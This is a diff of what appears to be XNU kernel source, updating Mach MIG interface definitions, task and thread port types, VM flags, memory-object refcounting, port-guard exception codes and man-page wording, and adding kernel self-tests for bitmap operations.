+simport <kern/sync_lock.h>;        /* for lock-set conversions */
+simport <kern/sync_sema.h>;        /* for semaphore conversions */
 simport <ipc/ipc_eventlink.h>;  /* for eventlink conversions */
 simport <vm/memory_object.h>;  /* for memory object type conversions */
-simport <vm/vm_map.h>;         /* for vm_map conversions */
+simport <vm/vm_map.h>;             /* for vm_map conversions */
 #if CONFIG_ARCADE
-simport <kern/arcade.h>;    /* for arcade_register conversions */
+simport <kern/arcade.h>;        /* for arcade_register conversions */
 #endif
 #endif /* MACH_KERNEL_PRIVATE */
 
-simport <kern/ipc_mig.h>;      /* pick up kernel-specific MIG things */
+simport <kern/ipc_mig.h>;          /* pick up kernel-specific MIG things */
 
 simport <kern/suid_cred.h>;
+simport <kern/task_ident.h>;    /* for task_id_token conversions */
 #endif /* KERNEL_SERVER */
 
 import <mach/mig.h>;
index bf5c680b20116e027928322a4d471f552203091d..70ff5787524f8ccc579fba9fd4cce4b470963083 100644 (file)
@@ -137,6 +137,7 @@ typedef struct arcade_register          *arcade_register_t;
 typedef struct ipc_eventlink            *ipc_eventlink_t;
 typedef struct ipc_port                 *eventlink_port_pair_t[2];
 typedef struct suid_cred                *suid_cred_t;
+typedef struct task_id_token            *task_id_token_t;
 
 /*
  * OBSOLETE: lock_set interfaces are obsolete.
@@ -203,6 +204,7 @@ typedef mach_port_t             arcade_register_t;
 typedef mach_port_t             ipc_eventlink_t;
 typedef mach_port_t             eventlink_port_pair_t[2];
 typedef mach_port_t             suid_cred_t;
+typedef mach_port_t             task_id_token_t;
 
 #endif  /* KERNEL */
 
@@ -226,6 +228,8 @@ typedef mach_port_t             io_master_t;
 typedef mach_port_t             UNDServerRef;
 typedef mach_port_t             mach_eventlink_t;
 
+typedef ipc_info_port_t         exception_handler_info_t;
+
 /*
  * Mig doesn't translate the components of an array.
  * For example, Mig won't use the thread_t translations
@@ -305,6 +309,7 @@ typedef uint32_t suid_cred_uid_t;
 #define MACH_EVENTLINK_NULL     ((mach_eventlink_t) 0)
 #define IPC_EVENTLINK_NULL      ((ipc_eventlink_t) NULL)
 #define SUID_CRED_NULL          ((suid_cred_t) NULL)
+#define TASK_ID_TOKEN_NULL      ((task_id_token_t) NULL)
 #else
 #define TASK_NULL               ((task_t) 0)
 #define TASK_NAME_NULL          ((task_name_t) 0)
@@ -334,6 +339,7 @@ typedef uint32_t suid_cred_uid_t;
 #define MACH_EVENTLINK_NULL     ((mach_eventlink_t) 0)
 #define IPC_EVENTLINK_NULL      ((ipc_eventlink_t) 0)
 #define SUID_CRED_NULL          ((suid_cred_t) 0)
+#define TASK_ID_TOKEN_NULL      ((task_id_token_t) 0)
 #endif
 
 /* capability strictly _DECREASING_.
@@ -341,19 +347,19 @@ typedef uint32_t suid_cred_uid_t;
  * to be closest to the itk_lock. see task.h.
  */
 typedef unsigned int            mach_task_flavor_t;
-#define TASK_FLAVOR_CONTROL        0    /* a task_t */
+#define TASK_FLAVOR_CONTROL     0    /* a task_t */
 #define TASK_FLAVOR_READ        1    /* a task_read_t */
 #define TASK_FLAVOR_INSPECT     2    /* a task_inspect_t */
 #define TASK_FLAVOR_NAME        3    /* a task_name_t */
 
 /* capability strictly _DECREASING_ */
 typedef unsigned int            mach_thread_flavor_t;
-#define THREAD_FLAVOR_CONTROL    0    /* a thread_t */
+#define THREAD_FLAVOR_CONTROL   0    /* a thread_t */
 #define THREAD_FLAVOR_READ      1    /* a thread_read_t */
 #define THREAD_FLAVOR_INSPECT   2    /* a thread_inspect_t */
 
 /* DEPRECATED */
-typedef natural_t       ledger_item_t;
+typedef natural_t               ledger_item_t;
 #define LEDGER_ITEM_INFINITY    ((ledger_item_t) (~0))
 
 typedef int64_t                 ledger_amount_t;
index 94f3db9181b622477fd7862df362d31a0ea4bcde..df2466fa9fb5c8b9b0cf8b78e696f3e955610aea 100644 (file)
@@ -509,6 +509,30 @@ routine mach_vm_page_range_query(
 skip;
 #endif
 
+/*
+ *      Map portion of a task's address space, {max, cur}_protection is inout.
+ */
+#if !defined(_MACH_VM_PUBLISH_AS_LOCAL_)
+routine PREFIX(KERNEL_SERVER_SUFFIX(mach_vm_remap_new)) (
+#else
+routine PREFIX(KERNEL_SERVER_SUFFIX(vm_remap_new)) (
+#endif
+               target_task     : vm_map_t;
+  inout        target_address  : mach_vm_address_t;
+               size            : mach_vm_size_t;
+               mask            : mach_vm_offset_t;
+               flags           : int;
+#ifdef KERNEL_SERVER
+               src_tport   : mach_port_t;
+#else
+               src_task        : vm_map_read_t;
+#endif
+               src_address     : mach_vm_address_t;
+               copy            : boolean_t;
+  inout        cur_protection  : vm_prot_t;
+  inout        max_protection  : vm_prot_t;
+               inheritance     : vm_inherit_t);
+
 /****************************** Legacy section ***************************/
 /*  The following definitions are exist to provide compatibility with    */
 /*  the legacy APIs.  They are no different.  We just need to produce    */
index 3decdd8aa60a4e1e3e3ff3dabea5bf89d5f7c55b..3ec4e987075221504ba9fa5ff90838c0e88c795e 100644 (file)
@@ -66,7 +66,7 @@ routine mach_voucher_attr_command(
 
 /* extract a recipe array to reconstitue all the key values in a future voucher */
 routine mach_voucher_debug_info(
-               task            : ipc_space_t;
+               task            : ipc_space_read_t;
                voucher_name: mach_port_name_t;
        out     recipes         : mach_voucher_attr_raw_recipe_array_t, CountInOut);
 
index b7d4a4659692a4bfbcb38d290ae25e661b86f106..a3f35d645e4e0e240385609b2151757fd1c340f1 100644 (file)
 
 #include <sys/cdefs.h>
 
+#if XNU_KERNEL_PRIVATE
+#include <os/refcnt.h>
+#if __LP64__
+#define MEMORY_OBJECT_HAS_REFCOUNT 1
+#else
+#define MEMORY_OBJECT_HAS_REFCOUNT 0
+#endif
+#endif /* XNU_KERNEL_PRIVATE */
+
 #define VM_64_BIT_DATA_OBJECTS
 
 typedef unsigned long long      memory_object_offset_t;
@@ -100,24 +109,31 @@ typedef natural_t mo_ipc_object_bits_t;
 
 struct memory_object_pager_ops; /* forward declaration */
 
+typedef struct vm_object       *memory_object_control_t;
 /*
- * "memory_object" and "memory_object_control" types used to be Mach ports
- * in user space and can be passed as such to some kernel APIs.
- * Their first field must match the "io_bits" field of a
- * "struct ipc_object" to identify them as a "IKOT_MEMORY_OBJECT" and
- * "IKOT_MEM_OBJ_CONTROL" respectively.
+ * "memory_object" used to be a Mach port in user space and could be passed
+ * as such to some kernel APIs.
+ *
+ * Its first field must match the "io_bits" field of a
+ * "struct ipc_object" to identify them as a "IKOT_MEMORY_OBJECT".
  */
-typedef struct          memory_object {
+typedef struct memory_object {
        mo_ipc_object_bits_t                    mo_ikot; /* DO NOT CHANGE */
+#if __LP64__
+#if XNU_KERNEL_PRIVATE
+       /*
+        * On LP64 there's a 4 byte hole that is perfect for a refcount.
+        * Expose it so that all pagers can take advantage of it.
+        */
+       os_ref_atomic_t                         mo_ref;
+#else
+       unsigned int                            __mo_padding;
+#endif /* XNU_KERNEL_PRIVATE */
+#endif /* __LP64__ */
        const struct memory_object_pager_ops    *mo_pager_ops;
-       struct memory_object_control            *mo_control;
+       memory_object_control_t                 mo_control;
 } *memory_object_t;
 
-typedef struct          memory_object_control {
-       mo_ipc_object_bits_t    moc_ikot; /* DO NOT CHANGE */
-       struct vm_object        *moc_object;
-} *memory_object_control_t;
-
 typedef const struct memory_object_pager_ops {
        void (*memory_object_reference)(
                memory_object_t mem_obj);
@@ -177,6 +193,11 @@ typedef const struct memory_object_pager_ops {
 #else   /* KERNEL_PRIVATE */
 
 typedef mach_port_t     memory_object_t;
+/*
+ * vestigial, maintained for source compatibility,
+ * no MIG interface will accept or return non NULL
+ * objects for those.
+ */
 typedef mach_port_t     memory_object_control_t;
 
 #endif  /* KERNEL_PRIVATE */
@@ -441,10 +462,8 @@ typedef struct memory_object_attr_info  memory_object_attr_info_data_t;
 #define MAX_UPL_TRANSFER_BYTES  (1024 * 1024)
 #define MAX_UPL_SIZE_BYTES      (1024 * 1024 * 64)
 
-#ifndef CONFIG_EMBEDDED
 #define MAX_UPL_SIZE            (MAX_UPL_SIZE_BYTES / PAGE_SIZE)
 #define MAX_UPL_TRANSFER        (MAX_UPL_TRANSFER_BYTES / PAGE_SIZE)
-#endif
 
 struct upl_page_info {
        ppnum_t         phys_addr;      /* physical page index number */
index a70035eddb0cc31b99f951739025ffae26747b5a..9472cecea7c2395232a6cc6bdc0b14046ff54719 100644 (file)
@@ -142,8 +142,13 @@ typedef struct ipc_port         *ipc_port_t;
 
 #define IPC_PORT_NULL           ((ipc_port_t) NULL)
 #define IPC_PORT_DEAD           ((ipc_port_t)~0UL)
-#define IPC_PORT_VALID(port) \
-       ((port) != IPC_PORT_NULL && (port) != IPC_PORT_DEAD)
+#define IPC_PORT_VALID(port)    ipc_port_valid(port)
+
+static inline boolean_t
+ipc_port_valid(ipc_port_t port)
+{
+       return port != IPC_PORT_DEAD && port;
+}
 
 typedef ipc_port_t              mach_port_t;
 
@@ -269,7 +274,6 @@ typedef mach_port_type_t *mach_port_type_array_t;
 #define MACH_PORT_TYPE_DEAD_NAME    MACH_PORT_TYPE(MACH_PORT_RIGHT_DEAD_NAME)
 #define MACH_PORT_TYPE_LABELH       MACH_PORT_TYPE(MACH_PORT_RIGHT_LABELH) /* obsolete */
 
-
 #ifdef MACH_KERNEL_PRIVATE
 /* Holder used to have a receive right - remembered to filter exceptions */
 #define MACH_PORT_TYPE_EX_RECEIVE   MACH_PORT_TYPE_LABELH
@@ -451,9 +455,16 @@ enum mach_port_guard_exception_codes {
        kGUARD_EXC_SEND_INVALID_RIGHT    = 1u << 18,
        kGUARD_EXC_RCV_INVALID_NAME      = 1u << 19,
        kGUARD_EXC_RCV_GUARDED_DESC      = 1u << 20, /* should never be fatal; for development only */
+       kGUARD_EXC_MOD_REFS_NON_FATAL    = 1u << 21,
+       kGUARD_EXC_IMMOVABLE_NON_FATAL   = 1u << 22,
 };
 
-#define MAX_FATAL_kGUARD_EXC_CODE (1u << 6)
+#define MAX_FATAL_kGUARD_EXC_CODE (1u << 7)
+
+/*
+ * Mach port guard flags.
+ */
+#define MPG_FLAGS_NONE                             (0x00ull)
 
 /*
  * These flags are used as bits in the subcode of kGUARD_EXC_STRICT_REPLY exceptions.
@@ -465,6 +476,16 @@ enum mach_port_guard_exception_codes {
 #define MPG_FLAGS_STRICT_REPLY_MISMATCHED_PERSONA  (0x10ull << 56)
 #define MPG_FLAGS_STRICT_REPLY_MASK                (0xffull << 56)
 
+/*
+ * These flags are used as bits in the subcode of kGUARD_EXC_MOD_REFS exceptions.
+ */
+#define MPG_FLAGS_MOD_REFS_PINNED_DEALLOC          (0x01ull << 56)
+
+/*
+ * These flags are used as bits in the subcode of kGUARD_EXC_IMMOVABLE exceptions.
+ */
+#define MPG_FLAGS_IMMOVABLE_PINNED                 (0x01ull << 56)
+
 /*
  * Flags for mach_port_guard_with_flags. These flags extend
  * the attributes associated with a guarded port.
index dd9bd8404bb44c73daee894beb2bdd57a51fd2b0..72719058192e58c69995c78ca6205f8363d7d944 100644 (file)
@@ -86,6 +86,7 @@
 kernel_trap(_kernelrpc_mach_vm_allocate_trap,-10,5) /* 4 args, +1 for mach_vm_size_t */
 kernel_trap(_kernelrpc_mach_vm_purgable_control_trap,-11,5) /* 4 args, +1 for mach_vm_offset_t */
 kernel_trap(_kernelrpc_mach_vm_deallocate_trap,-12,5) /* 3 args, +2 for mach_vm_size_t and mach_vm_address_t */
+kernel_trap(task_dyld_process_info_notify_get,-13,4) /* 2 args, +2 for mach_vm_address_t */
 kernel_trap(_kernelrpc_mach_vm_protect_trap,-14,7) /* 5 args, +2 for mach_vm_address_t and mach_vm_size_t */
 kernel_trap(_kernelrpc_mach_vm_map_trap,-15,9)
 kernel_trap(_kernelrpc_mach_port_allocate_trap,-16,3)
index 9e82450c76ae9b158bfa4f30090d7903194ec5ec..fb6beab76ec967fd430b8cf733234ba1d90c5077 100644 (file)
@@ -72,6 +72,12 @@ subsystem
 #include <mach/mach_types.defs>
 #include <mach_debug/mach_debug_types.defs>
 
+#if !KERNEL && !LIBSYSCALL_INTERFACE
+#define PREFIX(NAME) _kernelrpc_ ## NAME
+#else
+#define PREFIX(NAME) NAME
+#endif
+
 /*
  *     Create a new task with an empty set of IPC rights,
  *     and having an address space constructed from the
@@ -153,7 +159,7 @@ routine     task_set_info(
  *     count for that task is non-zero.
  */
 routine        task_suspend(
-               target_task     : task_t);
+               target_task     : task_read_t);
 
 
 /*
@@ -163,7 +169,7 @@ routine     task_suspend(
  *     that also have non-zero suspend counts may execute.
  */
 routine        task_resume(
-               target_task     : task_t);
+               target_task     : task_read_t);
 
 /*
  *     Returns the current value of the selected special port
@@ -266,7 +272,7 @@ routine     task_swap_exception_ports(
                behavior        : exception_behavior_t;
                new_flavor      : thread_state_flavor_t;
          out   masks           : exception_mask_array_t;
-         out   old_handlerss   : exception_handler_array_t, SameCount;
+         out   old_handlers    : exception_handler_array_t, SameCount;
          out   old_behaviors   : exception_behavior_array_t, SameCount;
          out   old_flavors     : exception_flavor_array_t, SameCount);
 
@@ -455,7 +461,7 @@ routine task_set_phys_footprint_limit(
        out old_limit   : int);
 
 routine task_suspend2(
-               target_task : task_t;
+               target_task : task_read_t;
        out suspend_token : task_suspension_token_t);
 
 routine task_resume2(
@@ -480,7 +486,7 @@ routine task_swap_mach_voucher(
        inout   old_voucher     : ipc_voucher_t);
 
 routine task_generate_corpse(
-               task            :task_t;
+               task            :task_read_t;
        out     corpse_task_port:mach_port_t);
 
 routine task_map_corpse_info(
@@ -540,5 +546,39 @@ routine task_create_suid_cred(
                uid             : suid_cred_uid_t;
        out     delegation      : suid_cred_t);
 
+#if KERNEL || (!KERNEL && !LIBSYSCALL_INTERFACE)
+routine PREFIX(mach_task_is_self)(
+               task     : task_name_t;
+       out is_self  : boolean_t);
+#else
+       /* Do not generate header, use the one in mach_init.h */
+       skip;
+#endif
+
+routine task_dyld_process_info_notify_register(
+               target_task : task_read_t;
+               notify          : mach_port_make_send_t);
+
+routine task_create_identity_token(
+           task     : task_t;
+       out     token    : task_id_token_t);
+
+routine task_identity_token_get_task_port(
+           token    : task_id_token_t;
+               flavor   : task_flavor_t;
+       out task_port: mach_port_t);
+
+routine task_dyld_process_info_notify_deregister(
+               target_task : task_read_t;
+               notify          : mach_port_name_t);
+
+routine task_get_exception_ports_info(
+               port : mach_port_t;
+               exception_mask  : exception_mask_t;
+       out     masks           : exception_mask_array_t;
+       out     old_handlers_info       : exception_handler_info_array_t, SameCount;
+       out     old_behaviors   : exception_behavior_array_t, SameCount;
+       out     old_flavors     : exception_flavor_array_t, SameCount);
+       
 /* vim: set ft=c : */
 
index 1696fd3cf235ccbc1d0fc9662cea5e6f572a4be1..8974f5dd692095cff86d61e72c616d3427da4d63 100644 (file)
@@ -56,4 +56,12 @@ routine find_code_signature(
                task_access_port                        : mach_port_t;
                new_pid                                 : int32_t);
 
+routine check_task_access_with_flavor(
+               task_access_port                        : mach_port_t;
+               calling_pid                             : int32_t;
+               calling_gid                             : uint32_t;
+               target_pid                              : int32_t;
+               flavor                  : mach_task_flavor_t;
+               ServerAuditToken        caller_cred     : audit_token_t);
+
 /* vim: set ft=c : */
index a2840ed89c9d9cbdf42665256af65910939061b5..fa561750fdee565b9f87088ef7576a378809a879 100644 (file)
@@ -81,7 +81,9 @@ typedef int     task_special_port_t;
 
 #define TASK_READ_PORT          6       /* The read port for task. */
 
-
+/*
+ * Evolving and likely to change.
+ */
 
 #define TASK_SEATBELT_PORT      7       /* Seatbelt compiler/DEM port for task. */
 
index e7f20e54cdc6a787142639dc395315821070dc03..162f0f54bbe107260fe5ed84edc4ab7d04c302aa 100644 (file)
@@ -164,14 +164,14 @@ thread_set_state(
  *     for its task is also zero.
  */
 routine        thread_suspend(
-               target_act      : thread_act_t);
+               target_act      : thread_read_t);
 
 /*
  *     Decrement the suspend count for the target thread,
  *     if that count is not already zero.
  */
 routine        thread_resume(
-               target_act      : thread_act_t);
+               target_act      : thread_read_t);
 
 /*
  *     Cause any user or meta- instructions currently being
@@ -385,6 +385,17 @@ routine thread_convert_thread_state(
        out     out_state       : thread_state_t, CountInOut);
 
 #ifdef XNU_KERNEL_PRIVATE
-#endif
+       skip;
+#else
+       skip;
+#endif /* XNU_KERNEL_PRIVATE */
+
+routine thread_get_exception_ports_info(
+               port : mach_port_t;
+               exception_mask  : exception_mask_t;
+       out     masks           : exception_mask_array_t;
+       out     old_handlers_info       : exception_handler_info_array_t, SameCount;
+       out     old_behaviors   : exception_behavior_array_t, SameCount;
+       out     old_flavors     : exception_flavor_array_t, SameCount);
 
 /* vim: set ft=c : */
index 7bb1bea5ae3d7b35b947346521503385c255e24e..1a24db516ce7f364c6b4a93fe257e01b81f6d494 100644 (file)
@@ -73,6 +73,7 @@
 
 #define THREAD_READ_PORT        3       /* The read port for thread. */
 
+#define THREAD_MAX_SPECIAL_PORT THREAD_READ_PORT
 /*
  *     Definitions for ease of use
  */
index 7caa92639bf8e55eb53620aa1f0ee6082c571bb4..14f172e4b4bd2ef9d4acaf05d78e099548b591f3 100644 (file)
@@ -506,5 +506,21 @@ routine PREFIX(vm_purgable_control) (
 routine vm_map_exec_lockdown(
                target_task     : vm_map_t);
 
+routine PREFIX(KERNEL_SERVER_SUFFIX(vm_remap_new)) (
+               target_task     : vm_map_t;
+inout  target_address  : vm_address_t;
+               size            : vm_size_t;
+               mask            : vm_address_t;
+               flags           : int;
+#ifdef KERNEL_SERVER
+               src_tport   : mach_port_t;
+#else
+               src_task        : vm_map_read_t;
+#endif
+               src_address     : vm_address_t;
+               copy            : boolean_t;
+inout  cur_protection  : vm_prot_t;
+inout  max_protection  : vm_prot_t;
+               inheritance     : vm_inherit_t);
 
 /* vim: set ft=c : */
index 9a518a2bbe02a38ec61498213107416712588439..e87b5d1b76543d1c19ca9845023d7edb1474ab1c 100644 (file)
@@ -242,7 +242,7 @@ extern uint64_t         max_mem;                /* 64-bit size of memory - limit
  * When we need to allocate a chunk of anonymous memory over that size,
  * we have to allocate more than one chunk.
  */
-#define ANON_MAX_SIZE   0xFFFFF000ULL
+#define ANON_MAX_SIZE   ((1ULL << 32) - PAGE_SIZE)
 /*
  * Work-around for <rdar://problem/6626493>
  * Break large anonymous memory areas into 128MB chunks to alleviate
index 3de12866967683d1c919fabf62e78fd303f36de5..f3038106efa4d4f8fd963cfd284e082025454d88 100644 (file)
@@ -309,6 +309,7 @@ typedef struct pmap_statistics  *pmap_statistics_t;
 #define VM_FLAGS_NO_CACHE       0x0010
 #define VM_FLAGS_RESILIENT_CODESIGN     0x0020
 #define VM_FLAGS_RESILIENT_MEDIA        0x0040
+#define VM_FLAGS_PERMANENT      0x0080
 #define VM_FLAGS_OVERWRITE      0x4000  /* delete any existing mappings first */
 /*
  * VM_FLAGS_SUPERPAGE_MASK
@@ -334,6 +335,7 @@ typedef struct pmap_statistics  *pmap_statistics_t;
                                 VM_FLAGS_4GB_CHUNK |           \
                                 VM_FLAGS_RANDOM_ADDR |         \
                                 VM_FLAGS_NO_CACHE |            \
+                                VM_FLAGS_PERMANENT |           \
                                 VM_FLAGS_OVERWRITE |           \
                                 VM_FLAGS_SUPERPAGE_MASK |      \
                                 VM_FLAGS_ALIAS_MASK)
@@ -688,8 +690,9 @@ typedef struct {
 #define VM_KERN_MEMORY_SKYWALK          26
 #define VM_KERN_MEMORY_LTABLE           27
 #define VM_KERN_MEMORY_HV               28
+#define VM_KERN_MEMORY_RETIRED          29
 
-#define VM_KERN_MEMORY_FIRST_DYNAMIC    29
+#define VM_KERN_MEMORY_FIRST_DYNAMIC    30
 /* out of tags: */
 #define VM_KERN_MEMORY_ANY              255
 #define VM_KERN_MEMORY_COUNT            256
index e29742be6cc4f90d588d40b725da67b56b8d0944..2b02e84a5017cc6dcb4ef1a358a0d73736950534 100644 (file)
@@ -160,10 +160,8 @@ struct vm_allocation_total {
 };
 
 struct vm_allocation_zone_total {
-       uint64_t  total;
-       uint64_t  peak;
-       uint32_t  waste;
-       uint32_t  wastediv;
+       vm_size_t vazt_total;
+       vm_size_t vazt_peak;
 };
 typedef struct vm_allocation_zone_total vm_allocation_zone_total_t;
 
index 520830894a95b65f8a67cc268eec5e077716b5a1..c0e387b16f175ff46844c906df4bc77d1a7a831c 100644 (file)
@@ -113,4 +113,11 @@ typedef struct ipc_info_tree_name {
 
 typedef ipc_info_tree_name_t *ipc_info_tree_name_array_t;
 
+typedef struct ipc_info_port {
+       natural_t iip_port_object;      /* port object identifier */
+       natural_t iip_receiver_object;  /* receiver task identifier (if any) */
+} ipc_info_port_t;
+
+typedef ipc_info_port_t *exception_handler_info_array_t;
+
 #endif  /* _MACH_DEBUG_IPC_INFO_H_ */
index 40eae37e9eaa21a9971042f8cf3a9df3fd593968..7f2508772c40d38b072e302b235f7eaf0ea94bc5 100644 (file)
@@ -51,13 +51,6 @@ __BEGIN_DECLS
  */
 bool ml_cpu_can_exit(int cpu_id);
 
-/*!
- * @function      ml_cpu_init_state
- * @brief         Needs to be called from schedulable context prior to using
- *                the ml_cpu_*_state_transition or ml_cpu_*_loop functions.
- */
-void ml_cpu_init_state(void);
-
 /*!
  * @function      ml_cpu_begin_state_transition
  * @brief         Tell the platform code that processor_start() or
index 9ff80bc284b43773bf4698e6a25ddd24f86ab810..f6ccb2bead6a22ba9dab9667d9e91900917adca5 100644 (file)
@@ -46,8 +46,8 @@ values are:
 <dt> <strong>TASK_KERNEL_PORT</strong>
 <dd>
 [task-self send right] The port used to control this task.  Used 
-to send messages that affect the task.  This is the port returne
-by <strong>mach_task_self</strong>.
+to send messages that affect the task.  This is the movable task port an
+different from the one returned by <strong>mach_task_self</strong> (immovable).
 <p>
 <dt> <strong>TASK_BOOTSTRAP_PORT</strong>
 <dd>
index 55cc0d71668f5af421b731f3865a03aa80ae2c96..1cabc6171d918097793fdc979fb0831b77068cad 100644 (file)
@@ -51,10 +51,10 @@ messages requesting return of other system service ports.
 <dt> <strong>TASK_KERNEL_PORT</strong>
 <dd>
 [task-self send right] The task's kernel port.  Used by the
-kernel to receive messages to manipulate the task.  This is the 
-port returned by <strong>mach_task_self</strong>.  Setting this special port 
-does not change the identity of the kernel port that names the 
-task; this simply changes the value returned as the kernel
+kernel to receive messages to manipulate the task. This is the movable task 
+port and different from the one returned by <strong>mach_task_self</strong> 
+(immovable). Setting this special port does not change the identity of the 
+kernel port that names the task; this simply changes the value returned as the kernel
 special port.
 <p>
 <dt> <strong>TASK_HOST_NAME_PORT</strong>
index f8e0abba6a10ab6e571fbf26a5bbba0349abb111..ee0639063540045eca95e7017dc9020f568b1fc7 100644 (file)
@@ -36,8 +36,8 @@ values are:
 <dt> <strong>THREAD_KERNEL_PORT</strong>
 <dd>
 [thread-self send right] The port used to name the thread. 
-Used to invoke operations that affect the thread.  This is the 
-port returned by <strong>mach_thread_self</strong>.
+Used to invoke operations that affect the thread. This is the movable
+port for the thread and different from <strong>mach_thread_self</strong> (immovable).
 </dl>
 <p>
 <dt> <var>special_port</var> 
index 251d27536d32e7a31bfc0ae3155b3adb3b3899b6..9fa9605b87930d67b86fe8a1b6cb55405f42b179 100644 (file)
@@ -33,8 +33,8 @@ The special port to be set.  Valid values are:
 <dt> <strong>THREAD_KERNEL_PORT</strong>
 <dd>
 [thread-self port] The thread's kernel port.  Used by the kernel 
-to receive messages from the thread.  This is the port returned 
-by <strong>mach_thread_self</strong>.
+to receive messages from the thread.  This is the movable
+port for the thread and different from <strong>mach_thread_self</strong>(immovable).
 </dl>
 <p>
 <dt> <var>special_port</var> 
index ea1ac1dfec195b0824678c9793735e9464ccfe98..18a8134a3c2aa2007783ae506fa0717e597c385d 100644 (file)
@@ -37,7 +37,6 @@
 #include <kern/misc_protos.h>
 #include <pexpert/pexpert.h>
 #include <prng/entropy.h>
-#include <crypto/entropy/entropy_sysctl.h>
 #include <machine/machine_routines.h>
 #include <libkern/section_keywords.h>
 #include <sys/cdefs.h>
@@ -160,7 +159,6 @@ entropy_analysis_init(uint32_t sample_count)
        entropy_analysis_max_sample_count = sample_count;
        entropy_analysis_buffer_size = sample_count * sizeof(entropy_sample_t);
        entropy_analysis_buffer = zalloc_permanent(entropy_analysis_buffer_size, ZALIGN(entropy_sample_t));
-       entropy_analysis_register_sysctls();
 }
 
 __startup_func
index 9d8d80b13594fd256da0bd77c8462b6f5f387892..074e0a67f00c73c13246a49936f2ec437738d475 100644 (file)
@@ -32,6 +32,7 @@
 #include <tests/xnupost.h>
 #include <kern/kalloc.h>
 #include <kern/bits.h>
+#include <pexpert/pexpert.h>
 
 extern void dump_bitmap_next(bitmap_t *map, uint nbits);
 extern void dump_bitmap_lsb(bitmap_t *map, uint nbits);
@@ -117,7 +118,57 @@ test_bitmap(void)
                assert(bitmap_first(map, nbits) == -1);
                assert(bitmap_lsb_first(map, nbits) == -1);
 
+               /* bitmap_not */
+               bitmap_not(map, map, nbits);
+               assert(bitmap_is_full(map, nbits));
+
+               bitmap_not(map, map, nbits);
+               assert(bitmap_first(map, nbits) == -1);
+               assert(bitmap_lsb_first(map, nbits) == -1);
+
+               /* bitmap_and */
+               bitmap_t *map0 = bitmap_alloc(nbits);
+               assert(bitmap_first(map0, nbits) == -1);
+
+               bitmap_t *map1 = bitmap_alloc(nbits);
+               bitmap_full(map1, nbits);
+               assert(bitmap_is_full(map1, nbits));
+
+               bitmap_and(map, map0, map1, nbits);
+               assert(bitmap_first(map, nbits) == -1);
+
+               bitmap_and(map, map1, map1, nbits);
+               assert(bitmap_is_full(map, nbits));
+
+               /* bitmap_and_not */
+               bitmap_and_not(map, map0, map1, nbits);
+               assert(bitmap_first(map, nbits) == -1);
+
+               bitmap_and_not(map, map1, map0, nbits);
+               assert(bitmap_is_full(map, nbits));
+
+               /* bitmap_equal */
+               for (uint i = 0; i < nbits; i++) {
+                       bitmap_clear(map, i);
+                       assert(!bitmap_equal(map, map1, nbits));
+                       bitmap_set(map, i);
+                       assert(bitmap_equal(map, map1, nbits));
+               }
+
+               /* bitmap_and_not_mask_first */
+               for (uint i = 0; i < nbits; i++) {
+                       bitmap_clear(map, i);
+                       expected_result = i;
+                       int result = bitmap_and_not_mask_first(map1, map, nbits);
+                       assert(result == expected_result);
+                       bitmap_set(map, i);
+                       result = bitmap_and_not_mask_first(map1, map, nbits);
+                       assert(result == -1);
+               }
+
                bitmap_free(map, nbits);
+               bitmap_free(map0, nbits);
+               bitmap_free(map1, nbits);
        }
 }
 
index da46869c7e4d9734a4204776096b793498dbb70c..05e18039062cb46b967dedca29324ce8b7f59ca0 100644 (file)
@@ -85,6 +85,7 @@ extern kern_return_t console_serial_parallel_log_tests(void);
 extern kern_return_t test_os_log(void);
 extern kern_return_t test_os_log_parallel(void);
 extern kern_return_t bitmap_post_test(void);
+extern kern_return_t counter_tests(void);
 
 #ifdef __arm64__
 extern kern_return_t arm64_munger_test(void);
@@ -138,7 +139,8 @@ struct xnupost_test kernel_post_tests[] = {XNUPOST_TEST_CONFIG_BASIC(zalloc_test
 #if __ARM_VFP__
                                           XNUPOST_TEST_CONFIG_BASIC(vfp_state_test),
 #endif
-                                          XNUPOST_TEST_CONFIG_BASIC(vm_tests), };
+                                          XNUPOST_TEST_CONFIG_BASIC(vm_tests),
+                                          XNUPOST_TEST_CONFIG_BASIC(counter_tests)};
 
 uint32_t kernel_post_tests_count = sizeof(kernel_post_tests) / sizeof(xnupost_test_data_t);
 
@@ -405,7 +407,7 @@ zalloc_test(void)
            ZC_DESTRUCTIBLE);
        T_ASSERT_NOTNULL(test_zone, NULL);
 
-       T_ASSERT_EQ_INT(test_zone->countfree, 0, NULL);
+       T_ASSERT_EQ_INT(test_zone->z_elems_free, 0, NULL);
        T_SETUPEND;
 
        T_ASSERT_NOTNULL(test_ptr = zalloc(test_zone), NULL);
index a9c4c8bb54889752c21b261137d0933bb0574ee4..23397bef47b4ddbad1e065fb4a550b4ce496cdcf 100644 (file)
@@ -85,7 +85,7 @@ ptrauth_data_tests(void)
 
        /* task_t */
        ALLOC_VALIDATE_DATA_PTR(struct task, vm_map_t, map, "task.map");
-       ALLOC_VALIDATE_DATA_PTR(struct task, struct ipc_port *, itk_self[0], "task.itk_self");
+       ALLOC_VALIDATE_DATA_PTR(struct task, struct ipc_port *, itk_task_ports[0], "task.itk_task_ports");
        ALLOC_VALIDATE_DATA_PTR(struct task, struct ipc_port *, itk_settable_self, "task.itk_settable_self");
        ALLOC_VALIDATE_DATA_PTR(struct task, struct ipc_port *, itk_host, "task.itk_host");
        ALLOC_VALIDATE_DATA_PTR(struct task, struct ipc_port *, itk_bootstrap, "task.itk_bootstrap");
index d9f9cc2094325e9088355f4a5588ff2a57e710cf..04aaf3450527430a8126986ff45954bbc83b7f63 100644 (file)
@@ -11,6 +11,9 @@ DATAFILES =
 EXPORT_ONLY_FILES = \
        memory_types.h \
        pmap.h \
+       lz4.h \
+       lz4_constants.h \
+       lz4_assembly_select.h \
        vm_fault.h \
        vm_kern.h \
        vm_map.h \
index d85190a4a3e1b4c1d467255093bfb3a6660cd6b1..871b222427c838a8f77a06099b7064954b179827 100644 (file)
@@ -118,7 +118,11 @@ typedef struct vnode_pager {
        struct memory_object vn_pgr_hdr;
 
        /*  pager-specific */
-       struct os_refcnt        ref_count;
+#if MEMORY_OBJECT_HAS_REFCOUNT
+#define vn_pgr_hdr_ref      vn_pgr_hdr.mo_ref
+#else
+       os_ref_atomic_t         vn_pgr_hdr_ref;
+#endif
        struct vnode            *vnode_handle;  /* vnode handle              */
 } *vnode_pager_t;
 
@@ -650,7 +654,7 @@ vnode_pager_reference(
        vnode_pager_t   vnode_object;
 
        vnode_object = vnode_pager_lookup(mem_obj);
-       os_ref_retain(&vnode_object->ref_count);
+       os_ref_retain_raw(&vnode_object->vn_pgr_hdr_ref, NULL);
 }
